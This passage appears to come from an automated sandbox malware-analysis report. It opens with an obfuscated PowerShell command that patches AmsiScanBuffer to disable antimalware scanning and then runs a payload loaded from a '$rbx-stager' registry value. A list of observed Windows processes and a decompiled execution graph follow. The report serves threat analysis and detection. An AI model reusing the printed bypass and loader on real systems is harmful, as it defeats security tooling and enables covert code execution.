@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YxZiZRJBAeC=$ulnmlpDbsuVQN.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+'l'+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$vMVwdwXXnratZh=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$YxZiZRJBAeC,[Object]('L'+[Char](111)+''+'a'+''+'d'+'L'+[Char](105)+''+'b'+'r'+'a'+'r'+[Char](121)+''+[Char](65)+'')));$jdkLVqxnIKypBMyTV=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$YxZiZRJBAeC,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+'t')));$NDrexjH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vMVwdwXXnratZh,$SlSshRHzgoUjvXmeTqL).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$awqsGjGjEpzNvinnA=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$NDrexjH,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$JhEQuEJeuH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jdkLVqxnIKypBMyTV,$KUNWcDgsbwBzyQuTTnSbbx).Invoke($awqsGjGjEpzNvinnA,[uint32]8,4,[ref]$JhEQuEJeuH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$awqsGjGjEpzNvinnA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jdkLVqxnIKypBMyTV,$KUNWcDgsbwBzyQuTTnSbbx).Invoke($awqsGjGjEpzNvinnA,[uint32]8,0x20,[ref]$JhEQuEJeuH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+'x'+''+[Char](45)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
      Imagebase:0x7ff788560000
      File size:452'608 bytes
      MD5 hash:04029E121A0CFA5991749937DD22A1D9
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:36
      Start time:23:24:35
      Start date:03/10/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:37
      Start time:23:24:36
      Start date:03/10/2024
      Path:C:\Windows\System32\dllhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}
      Imagebase:0x7ff70f330000
      File size:21'312 bytes
      MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:38
      Start time:23:24:36
      Start date:03/10/2024
      Path:C:\Windows\System32\winlogon.exe
      Wow64 process (32bit):false
      Commandline:winlogon.exe
      Imagebase:0x7ff7cd660000
      File size:906'240 bytes
      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:39
      Start time:23:24:37
      Start date:03/10/2024
      Path:C:\Windows\System32\lsass.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\lsass.exe
      Imagebase:0x7ff7a2ae0000
      File size:59'456 bytes
      MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:40
      Start time:23:24:38
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:41
      Start time:23:24:38
      Start date:03/10/2024
      Path:C:\Windows\System32\dwm.exe
      Wow64 process (32bit):false
      Commandline:"dwm.exe"
      Imagebase:0x7ff74e710000
      File size:94'720 bytes
      MD5 hash:5C27608411832C5B39BA04E33D53536C
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:42
      Start time:23:24:39
      Start date:03/10/2024
      Path:C:\Windows\System32\wbem\WMIADAP.exe
      Wow64 process (32bit):false
      Commandline:wmiadap.exe /F /T /R
      Imagebase:0x7ff703d50000
      File size:182'272 bytes
      MD5 hash:1BFFABBD200C850E6346820E92B915DC
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:43
      Start time:23:24:40
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:44
      Start time:23:24:40
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:45
      Start time:23:24:40
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:46
      Start time:23:24:41
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:47
      Start time:23:24:41
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:48
      Start time:23:24:42
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:49
      Start time:23:24:43
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:50
      Start time:23:24:43
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:51
      Start time:23:24:44
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:52
      Start time:23:24:45
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:53
      Start time:23:24:45
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:54
      Start time:23:24:47
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:55
      Start time:23:24:47
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:56
      Start time:23:24:48
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:57
      Start time:23:24:48
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:58
      Start time:23:24:49
      Start date:03/10/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
      Imagebase:0x7ff6eef20000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:692
      Start time:23:24:59
      Start date:03/10/2024
      Path:C:\Windows\System32\Conhost.exe
      Wow64 process (32bit):
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:
      Has administrator privileges:
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:710
      Start time:23:25:07
      Start date:03/10/2024
      Path:C:\Windows\System32\Conhost.exe
      Wow64 process (32bit):
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:
      Has administrator privileges:
      Programmed in:C, C++ or other language
      Has exited:false

      Reset < >

        Execution Graph

        Execution Coverage:1%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:8.5%
        Total number of Nodes:1514
        Total number of Limit Nodes:6
        execution_graph 17027 22123c21bc4 17034 22123c21724 GetProcessHeap HeapAlloc 17027->17034 17029 22123c21bda Sleep 17030 22123c21724 50 API calls 17029->17030 17032 22123c21bd3 17030->17032 17032->17029 17033 22123c2159c StrCmpIW StrCmpW 17032->17033 17085 22123c219b0 17032->17085 17033->17032 17102 22123c21264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17034->17102 17036 22123c2174c 17103 22123c21000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17036->17103 17038 22123c21754 17104 22123c21264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17038->17104 17040 22123c2175d 17105 22123c21264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17040->17105 17042 22123c21766 17106 22123c21264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17042->17106 17044 22123c2176f 17107 22123c21000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17044->17107 17046 22123c21778 17108 22123c21000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17046->17108 17048 22123c21781 17109 22123c21000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17048->17109 17050 22123c2178a RegOpenKeyExW 17051 22123c219a2 17050->17051 17052 22123c217bc RegOpenKeyExW 17050->17052 17051->17032 17053 22123c217e5 17052->17053 17054 22123c217fb RegOpenKeyExW 17052->17054 17110 22123c212b8 RegQueryInfoKeyW 17053->17110 17056 22123c21836 RegOpenKeyExW 17054->17056 17057 22123c2181f 17054->17057 17059 22123c21871 RegOpenKeyExW 17056->17059 17060 22123c2185a 17056->17060 17119 22123c2104c RegQueryInfoKeyW 17057->17119 17064 22123c21895 17059->17064 17065 22123c218ac RegOpenKeyExW 17059->17065 17063 22123c212b8 16 API calls 17060->17063 17066 22123c21867 RegCloseKey 17063->17066 17067 22123c212b8 16 API calls 17064->17067 17068 22123c218e7 RegOpenKeyExW 17065->17068 17069 22123c218d0 17065->17069 17066->17059 17070 22123c218a2 RegCloseKey 17067->17070 17072 22123c21922 RegOpenKeyExW 17068->17072 17073 22123c2190b 17068->17073 17071 22123c212b8 16 API calls 17069->17071 17070->17065 17077 22123c218dd RegCloseKey 17071->17077 17075 22123c21946 17072->17075 17076 22123c2195d RegOpenKeyExW 17072->17076 17074 22123c2104c 6 API calls 17073->17074 17078 22123c21918 RegCloseKey 17074->17078 17079 22123c2104c 6 API calls 17075->17079 17080 22123c21981 17076->17080 17081 22123c21998 RegCloseKey 17076->17081 17077->17068 17078->17072 17082 22123c21953 RegCloseKey 17079->17082 17083 22123c2104c 6 API calls 17080->17083 17081->17051 17082->17076 17084 22123c2198e RegCloseKey 17083->17084 17084->17081 17124 22123c214a0 17085->17124 17102->17036 17103->17038 17104->17040 17105->17042 17106->17044 17107->17046 17108->17048 17109->17050 17111 22123c21323 GetProcessHeap HeapAlloc 17110->17111 17112 22123c21486 RegCloseKey 17110->17112 17113 22123c21472 GetProcessHeap HeapFree 17111->17113 17114 22123c2134e RegEnumValueW 17111->17114 17112->17054 17113->17112 17115 22123c213a1 17114->17115 17115->17113 17115->17114 17116 22123c21530 2 API calls 17115->17116 17117 22123c2141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 17115->17117 17118 22123c213cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 17115->17118 17116->17115 17117->17115 17118->17117 17120 22123c211b5 RegCloseKey 17119->17120 17122 22123c210bf 17119->17122 17120->17056 17121 22123c210cf RegEnumValueW 17121->17122 17122->17120 17122->17121 17123 22123c2114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 17122->17123 17123->17122 17125 22123c214e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 17124->17125 17126 22123c214c2 GetProcessHeap HeapFree 17124->17126 17126->17125 17126->17126 17127 22123c347c2 17128 22123c29978 __CxxCallCatchBlock 9 API calls 17127->17128 17131 22123c347d5 17128->17131 17129 22123c34814 __CxxCallCatchBlock 17130 22123c29324 _CreateFrameInfo 9 API calls 17129->17130 17132 22123c34828 17130->17132 17131->17129 17134 22123c28ff8 __CxxCallCatchBlock 9 API calls 17131->17134 17133 22123c29324 _CreateFrameInfo 9 API calls 17132->17133 17135 22123c34838 17133->17135 17134->17129 14934 22123c51bc4 14941 22123c51724 GetProcessHeap HeapAlloc 14934->14941 14936 22123c51bda SleepEx 14937 22123c51724 50 API calls 14936->14937 14939 22123c51bd3 14937->14939 14939->14936 14940 22123c5159c StrCmpIW StrCmpW 14939->14940 14992 22123c519b0 14939->14992 14940->14939 15009 22123c51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14941->15009 14943 22123c5174c 15010 22123c51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14943->15010 14945 22123c51754 15011 22123c51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14945->15011 14947 22123c5175d 15012 22123c51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14947->15012 14949 22123c51766 15013 22123c51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14949->15013 14951 22123c5176f 15014 22123c51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14951->15014 14953 22123c51778 15015 22123c51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14953->15015 14955 22123c51781 15016 22123c51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14955->15016 14957 22123c5178a RegOpenKeyExW 14958 22123c519a2 14957->14958 14959 22123c517bc RegOpenKeyExW 14957->14959 14958->14939 14960 22123c517e5 14959->14960 14961 22123c517fb RegOpenKeyExW 14959->14961 15017 22123c512b8 RegQueryInfoKeyW 14960->15017 14962 22123c51836 RegOpenKeyExW 14961->14962 14963 22123c5181f 14961->14963 14967 22123c51871 RegOpenKeyExW 14962->14967 14968 22123c5185a 14962->14968 15026 22123c5104c RegQueryInfoKeyW 14963->15026 14971 22123c51895 14967->14971 14972 22123c518ac RegOpenKeyExW 14967->14972 14970 22123c512b8 16 API calls 14968->14970 14973 22123c51867 RegCloseKey 14970->14973 14974 22123c512b8 16 API calls 14971->14974 14975 22123c518e7 RegOpenKeyExW 14972->14975 14976 22123c518d0 14972->14976 14973->14967 14979 22123c518a2 RegCloseKey 14974->14979 14977 22123c51922 RegOpenKeyExW 14975->14977 14978 22123c5190b 14975->14978 14980 22123c512b8 16 API calls 14976->14980 14983 22123c51946 14977->14983 14984 22123c5195d RegOpenKeyExW 14977->14984 14982 22123c5104c 6 API calls 14978->14982 14979->14972 14981 22123c518dd RegCloseKey 14980->14981 14981->14975 14985 22123c51918 RegCloseKey 14982->14985 14986 22123c5104c 6 API calls 14983->14986 14987 22123c51998 RegCloseKey 14984->14987 14988 22123c51981 14984->14988 14985->14977 14989 22123c51953 RegCloseKey 14986->14989 14987->14958 14990 22123c5104c 6 API calls 14988->14990 14989->14984 14991 22123c5198e RegCloseKey 14990->14991 14991->14987 15036 22123c514a0 14992->15036 15009->14943 15010->14945 15011->14947 15012->14949 15013->14951 15014->14953 15015->14955 15016->14957 15018 22123c51486 RegCloseKey 15017->15018 15019 22123c51323 GetProcessHeap HeapAlloc 15017->15019 15018->14961 15020 22123c51472 GetProcessHeap HeapFree 15019->15020 15021 22123c5134e RegEnumValueW 15019->15021 15020->15018 15022 22123c513a1 15021->15022 15022->15020 15022->15021 15024 22123c513cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15022->15024 15025 22123c5141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15022->15025 15031 22123c51530 15022->15031 15024->15025 15025->15022 15027 22123c511b5 RegCloseKey 15026->15027 15029 22123c510bf 15026->15029 15027->14962 15028 22123c510cf RegEnumValueW 15028->15029 15029->15027 15029->15028 15030 22123c5114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15029->15030 15030->15029 15032 22123c51580 15031->15032 15033 22123c5154a 15031->15033 15032->15022 15033->15032 15034 22123c51561 StrCmpIW 15033->15034 15035 22123c51569 StrCmpW 15033->15035 15034->15033 15035->15033 15037 22123c514e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15036->15037 15038 22123c514c2 GetProcessHeap HeapFree 15036->15038 15038->15037 15038->15038 17145 22123c25fcc 17148 22123c25fd3 17145->17148 17146 22123c26000 VirtualProtect 17147 22123c26029 GetLastError 17146->17147 17149 22123c25f10 17146->17149 17147->17149 17148->17146 17148->17149 15377 22123c319d0 15380 22123c2e864 15377->15380 15381 22123c2e871 15380->15381 15382 22123c2e8b6 15380->15382 15386 22123c2cacc 15381->15386 15384 22123c2e8a0 15391 22123c2e53c 15384->15391 15387 22123c2cae8 FlsGetValue 15386->15387 15388 22123c2cae4 15386->15388 15387->15388 15389 22123c2cafe 15388->15389 15414 22123c2c940 GetLastError 15388->15414 15389->15384 15485 22123c2e7ac 15391->15485 15396 22123c2e58e 15396->15382 15399 22123c2e5a7 15400 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15399->15400 15400->15396 15401 22123c2e5b6 15401->15401 15511 22123c2e8e0 15401->15511 15404 22123c2e6b2 15405 22123c2d1f4 __std_exception_copy 13 API calls 15404->15405 15407 22123c2e6b7 15405->15407 15406 22123c2e70d 15409 22123c2e774 15406->15409 15522 22123c2e05c 15406->15522 15410 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15407->15410 15408 22123c2e6cc 15408->15406 15411 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15408->15411 15413 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15409->15413 15410->15396 15411->15406 15413->15396 15415 22123c2c966 15414->15415 15416 22123c2c96c SetLastError 15415->15416 15432 22123c2d220 15415->15432 15418 22123c2c9e5 15416->15418 15418->15389 15420 22123c2c9a5 FlsSetValue 15423 22123c2c9b1 FlsSetValue 15420->15423 15424 22123c2c9c8 15420->15424 15421 22123c2c995 FlsSetValue 15439 22123c2d2a0 15421->15439 15426 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 15423->15426 15445 22123c2c758 15424->15445 15428 22123c2c9c6 SetLastError 15426->15428 15428->15418 15433 22123c2d231 __std_exception_copy 15432->15433 15434 22123c2d282 15433->15434 15435 22123c2d266 HeapAlloc 15433->15435 15450 22123c2b470 15433->15450 15453 22123c2d1f4 15434->15453 15435->15433 15437 22123c2c987 15435->15437 15437->15420 15437->15421 15440 22123c2d2a5 HeapFree 15439->15440 15441 22123c2c9a3 15439->15441 15440->15441 15442 22123c2d2c0 GetLastError 15440->15442 15441->15416 15443 22123c2d2cd Concurrency::details::SchedulerProxy::DeleteThis 15442->15443 15444 22123c2d1f4 __std_exception_copy 11 API calls 15443->15444 15444->15441 15471 22123c2c630 15445->15471 15456 22123c2b4c0 15450->15456 15462 22123c2cb10 15453->15462 15461 22123c2c558 EnterCriticalSection 15456->15461 15463 22123c2cb59 GetLastError 15462->15463 15468 22123c2cb2f __std_exception_copy 15462->15468 15464 22123c2cb6c 15463->15464 15466 22123c2cb8a SetLastError 15464->15466 15467 22123c2cb87 15464->15467 15469 22123c2c940 __std_exception_copy 11 API calls 15464->15469 15465 22123c2cb54 15465->15437 15466->15465 15467->15466 15468->15465 15470 22123c2c940 __std_exception_copy 11 API calls 15468->15470 15469->15467 15470->15465 15483 22123c2c558 EnterCriticalSection 15471->15483 15486 22123c2e7cf 15485->15486 15492 22123c2e7d9 15486->15492 15537 22123c2c558 EnterCriticalSection 15486->15537 15493 22123c2e571 15492->15493 15494 22123c2cacc 14 API calls 15492->15494 15497 22123c2e22c 15493->15497 15495 22123c2e8a0 15494->15495 15496 22123c2e53c 56 API calls 15495->15496 15496->15493 15538 22123c2dd78 15497->15538 15500 22123c2e24c GetOEMCP 15503 22123c2e273 15500->15503 15501 22123c2e25e 15502 22123c2e263 GetACP 15501->15502 15501->15503 15502->15503 15503->15396 15504 22123c2c5d0 15503->15504 15505 22123c2c61b 15504->15505 15506 22123c2c5df __std_exception_copy 15504->15506 15507 22123c2d1f4 __std_exception_copy 13 API calls 15505->15507 15506->15505 15508 22123c2c602 HeapAlloc 15506->15508 15510 22123c2b470 __std_exception_copy 2 API calls 15506->15510 15509 22123c2c619 15507->15509 15508->15506 15508->15509 15509->15399 15509->15401 15510->15506 15512 22123c2e22c 16 API calls 15511->15512 15514 22123c2e91b 15512->15514 15513 22123c2ea71 15586 22123c28070 15513->15586 15514->15513 15515 22123c2e958 IsValidCodePage 15514->15515 15518 22123c2e972 15514->15518 15515->15513 15519 22123c2e969 15515->15519 15575 22123c2e344 15518->15575 15519->15518 15520 22123c2e998 GetCPInfo 15519->15520 15520->15513 15520->15518 15687 22123c2c558 EnterCriticalSection 15522->15687 15539 22123c2dd9c 15538->15539 15545 22123c2dd97 15538->15545 15539->15545 15546 22123c2cab0 15539->15546 15541 22123c2ddb7 15554 22123c2ffb4 15541->15554 15545->15500 15545->15501 15547 22123c2cb10 __std_exception_copy 13 API calls 15546->15547 15549 22123c2cab9 15547->15549 15548 22123c2cabe 15548->15541 15549->15548 15550 22123c2cae8 FlsGetValue 15549->15550 15552 22123c2cae4 15549->15552 15550->15552 15551 22123c2cafe 15551->15541 15552->15551 15553 22123c2c940 __std_exception_copy 13 API calls 15552->15553 15553->15551 15555 22123c2ffc9 15554->15555 15556 22123c2ddda 15554->15556 15555->15556 15562 22123c30a40 15555->15562 15558 22123c30020 15556->15558 15559 22123c30035 15558->15559 15560 22123c30048 15558->15560 15559->15560 15572 22123c2e8c4 15559->15572 15560->15545 15563 22123c2cab0 _invalid_parameter_noinfo 14 API calls 15562->15563 15564 22123c30a4f 15563->15564 15570 22123c30a95 15564->15570 15571 22123c2c558 EnterCriticalSection 15564->15571 15570->15556 15573 22123c2cab0 _invalid_parameter_noinfo 14 API calls 15572->15573 15574 22123c2e8cd 15573->15574 15576 22123c2e38f GetCPInfo 15575->15576 15577 22123c2e485 15575->15577 15576->15577 15582 22123c2e3a2 15576->15582 15578 22123c28070 _invalid_parameter_noinfo 8 API calls 15577->15578 15580 22123c2e524 15578->15580 15580->15513 15595 22123c31474 15582->15595 15587 22123c28079 15586->15587 15588 22123c28084 15587->15588 15589 22123c28848 IsProcessorFeaturePresent 15587->15589 15588->15404 15588->15408 15590 22123c28860 15589->15590 15682 22123c2891c RtlCaptureContext 15590->15682 15596 22123c2dd78 14 API calls 15595->15596 15597 22123c314b6 15596->15597 15615 22123c2ec58 15597->15615 15617 22123c2ec61 MultiByteToWideChar 15615->15617 15683 22123c28936 RtlLookupFunctionEntry 15682->15683 15684 22123c28873 15683->15684 15685 22123c2894c RtlVirtualUnwind 15683->15685 15686 22123c28814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15684->15686 15685->15683 15685->15684 16603 22123c2b0d4 16607 22123c2b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 16603->16607 16604 22123c2b0fb 16605 22123c29324 _CreateFrameInfo 9 API calls 16604->16605 16606 22123c2b100 16605->16606 16608 22123c29324 _CreateFrameInfo 9 API calls 16606->16608 16609 22123c2b10b __FrameHandler3::GetHandlerSearchState 16606->16609 16607->16604 16607->16609 16610 22123c299cc 9 API calls Is_bad_exception_allowed 16607->16610 16612 22123c299f4 16607->16612 16608->16609 16610->16607 16613 22123c29324 _CreateFrameInfo 9 API calls 16612->16613 16614 22123c29a02 16613->16614 16614->16607 15692 22123c2c1d8 15693 22123c2c1f1 15692->15693 15694 22123c2c209 15692->15694 15693->15694 15695 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15693->15695 15695->15694 17579 22123c22ed8 17581 22123c22f35 17579->17581 17580 22123c22f50 17581->17580 17582 22123c238a8 3 API calls 17581->17582 17582->17580 17583 22123c2f6dc 17584 22123c2f6e8 17583->17584 17585 22123c2f70f 17584->17585 17587 22123c31c0c 17584->17587 17588 